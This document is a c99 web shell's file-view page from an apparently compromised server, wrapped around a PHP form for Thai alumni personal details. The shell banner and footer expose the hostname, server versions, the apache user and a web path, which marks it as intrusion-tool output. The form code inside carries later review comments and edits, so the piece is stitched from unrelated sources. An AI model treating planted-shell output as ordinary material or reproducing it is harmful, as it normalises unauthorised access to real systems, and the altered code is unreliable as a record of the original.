!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/ealumni/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)


Viewing file:     v_infoAm_1.php (6.91 KB)      -rwxr-xr-x
<SCRIPT language=JavaScript type="text/JavaScript">
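/**
 * Client-side check of the 13-character citizen ID typed into #citizenId.
 *
 * The first 12 characters are weighted 13 down to 2 and summed; the value is
 * accepted when (11 - sum % 11) % 10 equals the 13th character. An accepted
 * value turns the field green, a rejected one raises an alert and turns it red.
 * A non-empty value of any other length raises a "not 13 digits" alert.
 *
 * This runs in the browser only and can be skipped by anyone submitting the
 * form directly, so it is a typing aid, not a control: the handler that
 * receives citizenId has to repeat the length, digit and checksum checks.
 */
function checkId(){
    var field = document.getElementById('citizenId');
    var value = field.value;
    // Declared locally: the original assigned i and sum without var, which
    // leaked them onto the global object (and throws in strict-mode code).
    var i, sum;

    if (value.length == 13) {
        for (i = 0, sum = 0; i < 12; i++) {
            sum += parseFloat(value.charAt(i)) * (13 - i);
        }
        // A non-digit character makes either side NaN, so the comparison
        // below is true and the value is rejected like a bad checksum.
        if ((11 - sum % 11) % 10 != parseFloat(value.charAt(12))) {
            alert('เลขบัตรประชาชนไม่ถูกต้อง กรุณาป้อนเลขบัตรประชาชนใหม่');
            field.style.color = "red";
        } else {
            field.style.color = "green";
        }
    } else if (value != "") {
        alert('เลขบัตรประชาชนไม่ครบ 13 หลัก');
    }
}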
</SCRIPT>
<?php
// Resolve the two rows this view pre-fills from. Each stays null unless the
// matching query variable was passed in and is non-null, in which case its
// row() result is used.
// NOTE(review): $qu_am / $qu_regName are presumably query result objects set
// by the controller; confirm against the caller.
$row_am = NULL;
if (isset($qu_am) && $qu_am != NULL) {
    $row_am = $qu_am->row();
}

$row_regName = NULL;
if (isset($qu_regName) && $qu_regName != NULL) {
    $row_regName = $qu_regName->row();
}
?>
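<?php
/*
 * Personal-details form. Posts as multipart/form-data to
 * info_alumni/process_infoAm_1 under the configured "ea_folder" prefix.
 *
 * Text inputs are pre-filled with set_value(field, default), where the default
 * comes from setValue(field, row) on $row_am or $row_regName.
 *
 * Changes against the listing as captured:
 *  - restored the "," and ":" separators that were missing between arguments,
 *    array entries and ternary branches (the code did not parse without them);
 *  - the English-name error cell now falls back to studentSurnameEng instead
 *    of repeating studentNameEng;
 *  - values echoed without set_value() (registry names, picturePath,
 *    alumniId, $tab) are passed through htmlspecialchars() with the
 *    application charset.
 *
 * NOTE(review): setValue(), getNowDateFw2() and splitDateDb2() are project
 * helpers not shown here. If setValue() already HTML-escapes, the added
 * htmlspecialchars() calls will double-encode; confirm against the helper.
 * NOTE(review): whether set_value() escapes its default argument depends on
 * the framework version in use; confirm for the fields that rely on it.
 * NOTE(review): whether form_open_multipart() emits an anti-CSRF token depends
 * on application configuration that is not visible here.
 */
echo form_open_multipart($this->config->item("ea_folder")."info_alumni/process_infoAm_1", array("name" => "myform", "id" => "myform"));?>
<table class="szone">
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td colspan="4" height="25px" class="inddent"><span class="h error indent">ข้อมูลส่วนตัว</span></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone">ชื่อ - สกุลปัจจุบัน ไทย</td>
        <td>
        <input type="text" name="prefixName" id="prefixName" value="<?php echo set_value('prefixName', setValue('prefixName',$row_am));?>" readonly size="8" class="input2" />
        <input type="hidden" name="prefixId" id="prefixId" value="<?php echo set_value('prefixId', setValue('prefixId',$row_am));?>" />
<?php
// Popup picker for the name prefix; the link body is a search icon.
echo anchor_popup($this->config->item("ea_folder")."popup/prefix", "<img src=\"".base_url().$this->config->item('rg_search')."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "550", "height" => "350"));
?>
        <input type="text" name="studentName" id="studentName" value="<?php echo set_value('studentName', setValue('studentName',$row_am));?>" size="15" maxlength="30" />
        <input type="text" name="studentSurname" id="studentSurname" value="<?php echo set_value('studentSurname', setValue('studentSurname',$row_am));?>" size="15" maxlength="30" />
        <span class="error"> *<?php echo form_error('prefixId') ? form_error('prefixId') : (form_error('studentName') ? form_error('studentName') : form_error('studentSurname'));?></span></td>
        <td class="coltd_szone">ชื่อ - สกุลปัจจุบัน อังกฤษ</td>
        <td>
        <input type="text" name="prefixNameEng" id="prefixNameEng" value="<?php echo set_value('prefixNameEng', strtoupper(setValue('prefixNameEng',$row_am)));?>" readonly size="8" class="input2" />
        <input type="text" name="studentNameEng" id="studentNameEng" value="<?php echo set_value('studentNameEng', setValue('studentNameEng',$row_am));?>" size="15" maxlength="30" />
        <input type="text" name="studentSurnameEng" id="studentSurnameEng" value="<?php echo set_value('studentSurnameEng', setValue('studentSurnameEng',$row_am));?>" size="15" maxlength="30" />
        <span class="error"> *<?php echo form_error('studentNameEng') ? form_error('studentNameEng') : form_error('studentSurnameEng');?></span></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone">ชื่อ - สกุลจากระบบทะเบียน ไทย</td>
        <td><?php
        // Read-only registry name, echoed into element content: escape for HTML. "-" when both parts are empty.
        echo (setValue('regStdName',$row_regName)=='' && setValue('regStdSurname',$row_regName)=='') ? "-" : htmlspecialchars(setValue('prefixName',$row_regName).setValue('regStdName',$row_regName).' '.setValue('regStdSurname',$row_regName), ENT_QUOTES, $this->config->item('charset'));?>
        </td>
        <td class="coltd_szone">ชื่อ - สกุลจากระบบทะเบียน อังกฤษ</td>
        <td><?php
        // Same as the Thai cell, for the English registry name.
        echo (setValue('regStdNameE',$row_regName)=='' && setValue('regStdSurnameE',$row_regName)=='') ? "-" : htmlspecialchars(strtoupper(setValue('prefixNameEng',$row_regName)).' '.setValue('regStdNameE',$row_regName).' '.setValue('regStdSurnameE',$row_regName), ENT_QUOTES, $this->config->item('charset'));?>
        </td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone">รหัสบัตรประชาชน</td>
<?php
        // onchange="checkId()" is a browser-side aid only; the handler must re-check the citizen ID.
?>
        <td colspan="3"><input type="text" name="citizenId" id="citizenId" value="<?php echo set_value('citizenId',setValue('citizenId',$row_am));?>" size="14" maxlength="13" class="required-int" onchange="checkId()" />
        <span class="error"><?php echo form_error('citizenId');?></span></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone">วันเกิด</td>
<?php
        // NOTE(review): the birth date below is written inside a JavaScript string literal.
        // HTML escaping is not sufficient in that context; the value needs JavaScript-string
        // escaping, or the handler must restrict birthDate to the DD/MM/YYYY shape before it
        // can be replayed here. Left unchanged because the right encoder depends on the PHP
        // version and helpers available to this application.
?>
        <td><script>DateInput('birthDate', true, 'DD/MM/YYYY', "<?php echo set_value('birthDate') ? set_value('birthDate') : ((setValue('birthDate',$row_am)=='0000-00-00') ? getNowDateFw2() : splitDateDb2(setValue('birthDate',$row_am),'/'));?>");</script></td>
        <td class="coltd_szone">หมู่เลือด</td>
        <td><input type="text" name="bloodGroup" id="bloodGroup" value="<?php echo set_value('bloodGroup', strtoupper(setValue('bloodGroup',$row_am)));?>" size="4" maxlength="3" />
        <br />(เช่น A, AB, O)
        <?php echo form_error('bloodGroup');?></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone">สัญชาติ</td>
        <td>
<?php
// Nationality select; options come from $rs_nt, selection from the posted value or the registry row.
echo form_dropdown('nationId', $rs_nt, set_value('nationId', setValue('nationId', $row_regName)));
?>
        </td>
        <td class="coltd_szone">ศาสนา</td>
        <td>
<?php
// Religion select; options come from $rs_rlg, selection from the posted value or the registry row.
echo form_dropdown('religionId', $rs_rlg, set_value('religionId', setValue('religionId', $row_regName)));
?>
        </td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone">อีเมล์</td>
        <td colspan="3"><input type="text" name="studentEmail" id="studentEmail" value="<?php echo set_value('studentEmail',setValue('studentEmail',$row_regName));?>" size="40" maxlength="70" />
        <?php echo form_error('studentEmail');?></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td class="coltd_szone">รูปนักศึกษา</td>
        <td colspan="3">
<?php
        // NOTE(review): the ".jpg only, at most 2 MB" rule printed below is text for the user.
        // The upload handler (not shown) has to enforce type and size itself, pick the stored
        // file name server-side, and keep uploads in a location where they are never executed
        // as PHP.
?>
        <input type="file" name="picturePath" id="picturePath" value="<?php echo htmlspecialchars(setValue('picturePath', $row_regName), ENT_QUOTES, $this->config->item('charset'));?>" />
        <span class="error"> (ขนาดรูปภาพควรมีขนาด 100x115 pixels เป็น .jpg เท่านั้น และขนาดไฟล์ไม่เกิน 2 MB)</span>
        <span class="error"><?php echo form_error('picturePath');?></span></td>
    </tr>
    <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
        <td align="center" colspan="4">
        <input type="submit" name="add" id="add" value="บันทึก" />
<?php
        // NOTE(review): alumniId and tab come back from the browser as hidden fields and can be
        // edited before submit. The handler should resolve the record from the authenticated
        // session, or verify that the caller owns alumniId, rather than trust the posted value.
?>
        <input type="hidden" name="alumniId" id="alumniId" value="<?php echo htmlspecialchars(setValue('alumniId',$row_regName), ENT_QUOTES, $this->config->item('charset'));?>" />
        <input type="hidden" name="tab" id="tab" value="<?php echo htmlspecialchars($tab, ENT_QUOTES, $this->config->item('charset'));?>" />
        </td>
    </tr>
</table><?php echo form_close();?>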

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0069 ]--